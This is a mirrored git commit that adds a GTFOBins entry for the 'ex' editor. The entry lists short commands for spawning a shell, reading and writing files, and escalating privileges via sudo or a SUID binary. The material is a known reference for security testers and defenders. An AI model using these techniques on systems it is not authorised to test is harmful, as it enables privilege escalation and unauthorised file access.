mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-12 23:12:06 +01:00
New command: ex
This commit is contained in:
parent
ff997ac104
commit
324e0e672a
28
_gtfobins/ex.md
Normal file
28
_gtfobins/ex.md
Normal file
@ -0,0 +1,28 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
ex
|
||||||
|
!/bin/sh
|
||||||
|
file-write:
|
||||||
|
- code: |
|
||||||
|
ex file_to_write
|
||||||
|
a
|
||||||
|
DATA
|
||||||
|
.
|
||||||
|
w
|
||||||
|
q
|
||||||
|
file-read:
|
||||||
|
- code: |
|
||||||
|
ex file_to_read
|
||||||
|
,p
|
||||||
|
q
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo ex
|
||||||
|
!/bin/sh
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./ex
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user